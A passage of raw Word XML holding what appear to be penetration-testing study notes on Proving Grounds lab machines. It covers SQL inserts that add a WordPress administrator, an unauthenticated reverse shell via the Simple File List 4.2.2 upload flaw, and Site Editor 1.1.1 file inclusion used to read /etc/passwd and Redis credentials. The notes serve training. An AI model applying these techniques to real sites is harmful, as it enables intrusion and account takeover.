        <w:t xml:space="preserve">PG Play walkthrough, they add a user to the MySQL wp_users table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E19">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT INTO wp_users(ID,user_login, user_pass) VALUES(3,"cristiano",</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5("password")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="800100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="458" name="image460.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image460.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1008"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2E1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could also try giving admin privileges to cristiano by referring wp_usermeta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4717082" cy="3076687"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="166" name="image156.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image156.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1009"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4717082" cy="3076687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E1F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert into wp_usermeta(umeta_id,user_id,meta_key,meta_value) VALUES (NULL,'3','wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}'), (NULL,"9000",'wp_user_level','10');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although they never tried to see if it worked, so this is just a theory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E24">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qfswbls4v9nm" w:id="407"/>
      <w:bookmarkEnd w:id="407"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get reverse shell from Simple File List 4.2.2 (NO AUTHENTICATION)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E25">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1010">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Nukem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, we saw from WPscan that we had two out–dated plugins, and both had exploitDB pages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple File List 4.2.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="506"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tutor 1.5.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E29">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We ended up trying Simple File List and so I never figured out of Tutor works. And the best part of this is what we don't need authentication for this exploit. We never found credentials for wordpress site. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit is a file upload exploit. And the WPScan also found the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/uploads </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">where the uploads likely go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1011">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used it to upload a web shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But them they claimed they had a hard time getting back a reverse shell from it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So they decided to edit the payload of the exploit and instead of a webshell, they uploaded a PHP reverse shell and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1012">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1013">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the medium original)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They uploaded reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then checked python3 version and verified python3 was there</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1368"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then URL encoded python rev shell and sent it, and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E38">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tei6hcu4oic2" w:id="408"/>
      <w:bookmarkEnd w:id="408"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get LFI with Site Editor 1.1.1 plugin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1014">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. We found this plugin from WPScan, and it was actually up-to-date according to the scan, but we searched it up anyways and we found this LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1015">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/44340</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then used it to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/apache2/sites-enabled/000-default.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to find the apache web root (apache root) directory </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then saw </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and used it to read /etc/redis/redis.conf where the redis credentials are stored so that we can use it to authenticate and run the Redis RCE exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="853"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1016">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then once they got a shell as another user, they put a reverse shell into the machine, and then used the LFI to trigger the rev shell, allowing them to pivot to the user who runs the apache server, which is Alice. </w:t>
      </w:r>
    </w:p>
